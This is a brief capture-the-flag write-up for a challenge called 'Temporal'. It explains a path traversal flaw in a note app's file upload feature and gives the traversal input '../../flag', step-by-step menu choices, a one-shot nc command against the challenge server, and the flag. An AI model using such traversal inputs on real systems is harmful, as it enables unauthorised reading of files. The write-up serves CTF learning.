Skip to main content

Temporal

Challenge

Content preserved from the original writeup source. Minimal normalization was applied to fit platform format.

Solution

Original Writeup Content (Preserved)

Temporal (190) Writeup

Vulnerability

The app's "Upload file to note" feature builds a path like:

/tmp/uploads/<user_input>

using snprintf, but it does not sanitize .. path components.

So we can use path traversal (e.g. ../../flag) to escape /tmp/uploads and read arbitrary files.

Exploit Steps

  1. Choose menu option 4 (Upload file to note)
  2. For filename, send ../../flag
  3. Choose destination note id, e.g. 0
  4. Choose menu option 3 (Print note)
  5. Print note id 0

One-shot solve command

cat << 'EOF' | nc 0.cloud.chals.io 26716
4
../../flag
0
3
0
7
EOF

Flag

UDCTF{t1m3_15_f4k3}